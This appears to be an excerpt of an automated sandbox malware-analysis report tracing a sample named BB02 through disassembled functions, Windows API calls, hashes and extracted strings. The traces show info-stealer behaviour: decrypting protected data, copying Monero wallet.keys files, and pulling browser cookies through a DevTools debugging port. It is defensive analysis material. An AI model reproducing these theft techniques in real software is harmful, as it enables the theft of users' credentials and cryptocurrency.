Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction ID: abf8395257343a8b015b9f0b6c8a158c8b551f0c270fe32e84b7b64ff486a2c6
Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction Fuzzy Hash: F701FB75E41309ABE7109BA4DC45BAAB779EB44700F504169FA04AB380DBB09E008BE4

Function 024E9E47 Relevance: 6.0, APIs: 4, Instructions: 43memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 024E9E66
LocalAlloc.KERNEL32(00000040,?), ref: 024E9E7A
memcpy.MSVCRT(00000000,?), ref: 024E9E91
LocalFree.KERNEL32(?), ref: 024E9E9E

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction ID: d0ead2a64dc00b592db8afae1cbfe359b2989e6c97957bf038e10719d680c5f9
Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction Fuzzy Hash: 76011D75A41305BFEB109BA4DC55FAFB779EB44701F104559FA05AB380DBB09A00CBE4

Function 00409B80 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B9B
LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BAA
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BC1
LocalFree.KERNEL32(?,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409BD0

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
Instruction ID: f56e211861b801462745ebf168d915f74eb1128f2766c7b67ff98b51cc3af22d
Opcode Fuzzy Hash: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
Instruction Fuzzy Hash: 31F0BD703453126BE7305F65AC49F577BA9EB04B61F240415FA49EA2C0E7B49C40CAA4

Function 024FCE47 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0042B140,00000000,00000001,0042B130,?), ref: 024FCE6D
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 024FCEAD
lstrcpyn.KERNEL32(?,?,00000104), ref: 024FCF30

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWidelstrcpyn
String ID:
API String ID: 1940255200-0
Opcode ID: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
Instruction ID: 4e53473a35b6cf7de6b44cbaf6feb3c971f6af0f31f8c57ac377ec6fdab86df4
Opcode Fuzzy Hash: 5bf1d04cd0d9c23ec7e4ee8b214c7d0ff5809634d7edf7c662a8ddbc22321378
Instruction Fuzzy Hash: BF315271A40619BFD750DB94CC81FAAB7B9AB88B14F504185FB04EB2D0D7B1AE45CBE0

Function 025033F7 Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 02503426
wsprintfA.USER32 ref: 0250343C

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: f2b723babcf60a3b2e20dccc16f3f6e98f9637a92399b293fba1354cc540c828
Instruction ID: f65817de7e7fd47d44b17b8021c7cd67f375be54b6912325e0058823345b8027
Opcode Fuzzy Hash: f2b723babcf60a3b2e20dccc16f3f6e98f9637a92399b293fba1354cc540c828
Instruction Fuzzy Hash: 14F090B1940618AFCB10CF84EC45FD9F77DFB48A20F40466AF90593280D7786A04CAE5

Function 02509A93 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

free.MSVCRT ref: 02509AA7
free.MSVCRT ref: 02509AAF
free.MSVCRT ref: 02509AB7
free.MSVCRT ref: 02509ABF
free.MSVCRT ref: 02509AC7
free.MSVCRT ref: 02509ACF
free.MSVCRT ref: 02509AD6
free.MSVCRT ref: 02509ADE
free.MSVCRT ref: 02509AE6
free.MSVCRT ref: 02509AEE
free.MSVCRT ref: 02509AF6
free.MSVCRT ref: 02509AFE
free.MSVCRT ref: 02509B06
free.MSVCRT ref: 02509B0E
free.MSVCRT ref: 02509B16
free.MSVCRT ref: 02509B1E
free.MSVCRT ref: 02509B29
free.MSVCRT ref: 02509B31
free.MSVCRT ref: 02509B39
free.MSVCRT ref: 02509B41
free.MSVCRT ref: 02509B49
free.MSVCRT ref: 02509B51
free.MSVCRT ref: 02509B59
free.MSVCRT ref: 02509B61
free.MSVCRT ref: 02509B69
free.MSVCRT ref: 02509B71
free.MSVCRT ref: 02509B79
free.MSVCRT ref: 02509B81
free.MSVCRT ref: 02509B89
free.MSVCRT ref: 02509B91
free.MSVCRT ref: 02509B99
free.MSVCRT ref: 02509BA1
free.MSVCRT ref: 02509BAF
free.MSVCRT ref: 02509BBA
free.MSVCRT ref: 02509BC5
free.MSVCRT ref: 02509BD0
free.MSVCRT ref: 02509BDB
free.MSVCRT ref: 02509BE6
free.MSVCRT ref: 02509BF1
free.MSVCRT ref: 02509BFC
free.MSVCRT ref: 02509C07
free.MSVCRT ref: 02509C12
free.MSVCRT ref: 02509C1D
free.MSVCRT ref: 02509C28
free.MSVCRT ref: 02509C33
free.MSVCRT ref: 02509C3E
free.MSVCRT ref: 02509C49
free.MSVCRT ref: 02509C54
free.MSVCRT ref: 02509C62
free.MSVCRT ref: 02509C6D
free.MSVCRT ref: 02509C78
free.MSVCRT ref: 02509C83
free.MSVCRT ref: 02509C8E
free.MSVCRT ref: 02509C99
free.MSVCRT ref: 02509CA4
free.MSVCRT ref: 02509CAF
free.MSVCRT ref: 02509CBA
free.MSVCRT ref: 02509CC5
free.MSVCRT ref: 02509CD0
free.MSVCRT ref: 02509CDB
free.MSVCRT ref: 02509CE6
free.MSVCRT ref: 02509CF1
free.MSVCRT ref: 02509CFC
free.MSVCRT ref: 02509D07
free.MSVCRT ref: 02509D15
free.MSVCRT ref: 02509D20
free.MSVCRT ref: 02509D2B
free.MSVCRT ref: 02509D36
free.MSVCRT ref: 02509D41
free.MSVCRT ref: 02509D4C
free.MSVCRT ref: 02509D57
free.MSVCRT ref: 02509D62
free.MSVCRT ref: 02509D6D
free.MSVCRT ref: 02509D78
free.MSVCRT ref: 02509D83
free.MSVCRT ref: 02509D8E
free.MSVCRT ref: 02509D99
free.MSVCRT ref: 02509DA4
free.MSVCRT ref: 02509DAF
free.MSVCRT ref: 02509DBA
free.MSVCRT ref: 02509DC8
free.MSVCRT ref: 02509DD3
free.MSVCRT ref: 02509DDE
free.MSVCRT ref: 02509DE9
free.MSVCRT ref: 02509DF4
free.MSVCRT ref: 02509DFF

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction ID: 973d5bc4533dc4fea8552c6d0eff70492944ed51919de6f6455af538d06952c4
Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction Fuzzy Hash: 9671E331410B069BD7B73F31DD41ACEFAA37F88301F104925A19A225F49E227E65DE59

Function 00401070 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 278stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040108A

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401015
Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000), ref: 0040101C
Part of subcall function 00401000: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401039
Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401053
Part of subcall function 00401000: RegCloseKey.ADVAPI32(?), ref: 0040105D

lstrcatA.KERNEL32(?,00000000), ref: 004010A0
lstrlenA.KERNEL32(?), ref: 004010AD
lstrcatA.KERNEL32(?,.keys), ref: 004010C8
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004010FF
lstrlenA.KERNEL32(00A3A9B0), ref: 0040110D
lstrcpy.KERNEL32(00000000,?), ref: 00401131
lstrcatA.KERNEL32(00000000,00A3A9B0), ref: 00401139
lstrlenA.KERNEL32(\Monero\wallet.keys), ref: 00401144
lstrcpy.KERNEL32(00000000,00000000), ref: 00401168
lstrcatA.KERNEL32(00000000,\Monero\wallet.keys), ref: 00401174
lstrcpy.KERNEL32(00000000,00000000), ref: 0040119A
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004011DF
lstrlenA.KERNEL32(00A3DFE0), ref: 004011EE
lstrcpy.KERNEL32(00000000,?), ref: 00401215
lstrcatA.KERNEL32(00000000,?), ref: 0040121D
lstrcpy.KERNEL32(00000000,00000000), ref: 00401258
lstrcatA.KERNEL32(00000000), ref: 00401265
lstrcpy.KERNEL32(00000000,00000000), ref: 0040128C
CopyFileA.KERNEL32(?,?,00000001), ref: 004012B5
lstrcpy.KERNEL32(00000000,?), ref: 004012E1
lstrcpy.KERNEL32(00000000,?), ref: 0040131D

Part of subcall function 0041EF30: lstrcpy.KERNEL32(00000000,?), ref: 0041EF62

DeleteFileA.KERNEL32(?), ref: 00401351
memset.MSVCRT ref: 0040136E

Strings

.keys, xrefs: 004010BC
\Monero\wallet.keys, xrefs: 0040113F, 0040116E

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocCloseCopyDeleteOpenProcessQueryValue
String ID: .keys$\Monero\wallet.keys
API String ID: 2734118222-3586502688
Opcode ID: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
Instruction ID: 95442954b0c09f74f01b2627741839e7c598bf71559ee3eba0e7726b6ccc06b1
Opcode Fuzzy Hash: 9eda4a6cc88766a33cd02c84d7baa0a0e4ec5d0bc14cb39f866b325505556883
Instruction Fuzzy Hash: F0A15E71A002059BCB10AFB5DD89A9F77B9AF48304F44417AF905F72E1DB78DD018BA8

Function 024F5E47 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F5E7C
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 024F5EAB
lstrcpy.KERNEL32(00000000,00000000), ref: 024F5EDC
lstrcpy.KERNEL32(00000000,00000000), ref: 024F5F04
lstrcat.KERNEL32(00000000,00000000), ref: 024F5F0F
lstrcpy.KERNEL32(00000000,00000000), ref: 024F5F37
lstrcpy.KERNEL32(00000000,00000000), ref: 024F5F6F
lstrcat.KERNEL32(00000000,00000000), ref: 024F5F7A
lstrcpy.KERNEL32(00000000,00000000), ref: 024F5F9F
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F5FD5
lstrcpy.KERNEL32(00000000,00000000), ref: 024F5FFD
lstrcat.KERNEL32(00000000,00000000), ref: 024F6008
lstrcpy.KERNEL32(00000000,00000000), ref: 024F602F
lstrlen.KERNEL32(00431D64), ref: 024F6041
lstrcpy.KERNEL32(00000000,00000000), ref: 024F6060
lstrcat.KERNEL32(00000000,00431D64), ref: 024F606C
lstrlen.KERNEL32(00638DD8), ref: 024F607B
lstrcpy.KERNEL32(00000000,00000000), ref: 024F609E
lstrcat.KERNEL32(00000000,00000000), ref: 024F60A9
lstrcpy.KERNEL32(00000000,00000000), ref: 024F60D3
lstrcpy.KERNEL32(00000000,00000000), ref: 024F60FF
GetFileAttributesA.KERNEL32(00000000), ref: 024F6106
lstrcpy.KERNEL32(00000000,?), ref: 024F615E
lstrcpy.KERNEL32(00000000,?), ref: 024F61CD
lstrcpy.KERNEL32(00000000,?), ref: 024F61FF
lstrcpy.KERNEL32(00000000,?), ref: 024F6242
lstrcpy.KERNEL32(00000000,00000000), ref: 024F626E
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F62A6
lstrcpy.KERNEL32(00000000,?), ref: 024F6318
lstrcpy.KERNEL32(00000000,00000000), ref: 024F633C

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
String ID:
API String ID: 2428362635-0
Opcode ID: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
Instruction ID: 35e3d35381c0a64f66b28cbc6d7c854ba03ab2883533e0e03573f8131ed65b25
Opcode Fuzzy Hash: 0aebda3382d32583c439ff0c954a19649f8748e18a2acc4a857f1244698f8087
Instruction Fuzzy Hash: A202A170A002559FEB21EF75CC88AAF7BFAAF84305F15442AE916A7350DB74D941CFA0

Function 024F6B07 Relevance: 43.9, APIs: 29, Instructions: 437stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F6B3C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024F6B77
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 024F6BA1
lstrcpy.KERNEL32(00000000,00000000), ref: 024F6BD8
lstrcpy.KERNEL32(00000000,00000000), ref: 024F6BFD
lstrcat.KERNEL32(00000000,00000000), ref: 024F6C05
lstrcpy.KERNEL32(00000000,00000000), ref: 024F6C2E

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$FolderPathlstrcat
String ID:
API String ID: 2938889746-0
Opcode ID: 86e5a9f99d952dc1f974e146edebfde16251fc6fa497a5deb16344c4399cf01b
Instruction ID: fc12113b59c35f37d3323172bea7d93029e95e99b20dff47fbbba7c2cfca23ec
Opcode Fuzzy Hash: 86e5a9f99d952dc1f974e146edebfde16251fc6fa497a5deb16344c4399cf01b
Instruction Fuzzy Hash: 04F1A371A002559FEB20EF75CC48AAF77BEAF84309F05442AE95697351DB78D901CFA0

Function 004092E0 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 365stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004090F0: InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 0040910F
Part of subcall function 004090F0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0040912C
Part of subcall function 004090F0: InternetCloseHandle.WININET(00000000), ref: 00409139
Part of subcall function 004090F0: strlen.MSVCRT ref: 00409155

strlen.MSVCRT ref: 00409311
strlen.MSVCRT ref: 0040932A

Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417EEF
Part of subcall function 00417EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417F09
Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417F28

Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6

memset.MSVCRT ref: 00409371
lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 0040938C
lstrcatA.KERNEL32(?,00000000), ref: 004093A2
strlen.MSVCRT ref: 004093C9
strlen.MSVCRT ref: 00409416
memcmp.MSVCRT(?,0042D01C,?), ref: 0040943B
memset.MSVCRT ref: 00409562
lstrcatA.KERNEL32(?,cookies), ref: 00409577
lstrcatA.KERNEL32(?,00431D64), ref: 00409589
lstrcatA.KERNEL32(?,?), ref: 0040959A
lstrcatA.KERNEL32(?,00435160), ref: 004095AC
lstrcatA.KERNEL32(?,?), ref: 004095BD
lstrcatA.KERNEL32(?,.txt), ref: 004095CF
lstrlenA.KERNEL32(?), ref: 004095E6
lstrlenA.KERNEL32(?), ref: 0040960B
lstrcpy.KERNEL32(00000000,?), ref: 00409644
memset.MSVCRT ref: 0040968C

Strings

localhost, xrefs: 004092FA, 00409318
/devtools, xrefs: 00409325, 00409330
ws://localhost:9229, xrefs: 00409380
cookies, xrefs: 0040956B
.txt, xrefs: 004095C3

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcat$strlen$Internetmemset$Openlstrlenmemchrmemcmp$CloseHandleXinvalid_argumentlstrcpystd::_
String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
API String ID: 2819545660-3542011879
Opcode ID: 3bfa10c1b4abe5d284f1050b5ea2d8c98c4b8e37d0dc89579856b6d55a03548b
Instruction ID: 864a5aaf990fcff81b4d6c55bfc79a47d2bf5be1f833ff5f37dcccbcd604048f
Opcode Fuzzy Hash: 3bfa10c1b4abe5d284f1050b5ea2d8c98c4b8e37d0dc89579856b6d55a03548b
Instruction Fuzzy Hash: 3EE12671E00218EBDF14DFA8C984ADEBBB5AF48304F50447AE509B7291DB789E45CF98

Function 02501E37 Relevance: 39.2, APIs: 26, Instructions: 192stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02506627: GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 02506680
Part of subcall function 02506627: GetProcAddress.KERNEL32(006390E0,00638E44), ref: 02506699
Part of subcall function 02506627: GetProcAddress.KERNEL32(006390E0,00638A64), ref: 025066B1
Part of subcall function 02506627: GetProcAddress.KERNEL32(006390E0,00638A50), ref: 025066C9
Part of subcall function 02506627: GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 025066E2
Part of subcall function 02506627: GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 025066FA
Part of subcall function 02506627: GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 02506712
Part of subcall function 02506627: GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 0250672B
Part of subcall function 02506627: GetProcAddress.KERNEL32(006390E0,00638D48), ref: 02506743
Part of subcall function 02506627: GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 0250675B
Part of subcall function 02506627: GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 02506774
Part of subcall function 02506627: GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 0250678C
Part of subcall function 02506627: GetProcAddress.KERNEL32(006390E0,006388B0), ref: 025067A4

lstrcpy.KERNEL32(00000000,0042D01C), ref: 02501E76
GetUserDefaultLangID.KERNEL32 ref: 02501E7C

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: AddressProc$DefaultLangUserlstrcpy
String ID:
API String ID: 4154271814-0
Opcode ID: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
Instruction ID: b56b93816557258e71ded2c6f6a0d07f150fbc47d9894fba593970ed5ecca22b
Opcode Fuzzy Hash: e9ed414595d713c08b5737fb47b7d7df39434625f9a60a04fbd9816609dc5aed
Instruction Fuzzy Hash: 6D618D71500616AFEB20AB71DC88A6E7ABBBF45749F045029F80A971A0DFB498019F65

Function 00421800 Relevance: 37.8, APIs: 25, Instructions: 269stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0042182F
lstrlenA.KERNEL32(00A15F80,00000000,00000000,?,?,00421B61), ref: 00421840
lstrcpy.KERNEL32(00000000,00000000), ref: 00421867
lstrcatA.KERNEL32(00000000,00000000), ref: 00421872
lstrcpy.KERNEL32(00000000,00000000), ref: 004218A1
lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 004218B3
lstrcpy.KERNEL32(00000000,00000000), ref: 004218D4
lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004218E0
lstrcpy.KERNEL32(00000000,00000000), ref: 0042190F
lstrlenA.KERNEL32(00A15FD0,?,?,00421B61), ref: 00421925
lstrcpy.KERNEL32(00000000,00000000), ref: 0042194C
lstrcatA.KERNEL32(00000000,00000000), ref: 00421957
lstrcpy.KERNEL32(00000000,00000000), ref: 00421986
lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 00421998
lstrcpy.KERNEL32(00000000,00000000), ref: 004219B9
lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004219C5
lstrcpy.KERNEL32(00000000,00000000), ref: 004219F4
lstrlenA.KERNEL32(00A15FA0,?,?,00421B61), ref: 00421A0A
lstrcpy.KERNEL32(00000000,00000000), ref: 00421A31
lstrcatA.KERNEL32(00000000,00000000), ref: 00421A3C
lstrcpy.KERNEL32(00000000,00000000), ref: 00421A6B
lstrlenA.KERNEL32(00A15E70,?,?,00421B61), ref: 00421A81
lstrcpy.KERNEL32(00000000,00000000), ref: 00421AA8
lstrcatA.KERNEL32(00000000,00000000), ref: 00421AB3
lstrcpy.KERNEL32(00000000,00000000), ref: 00421AE2

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
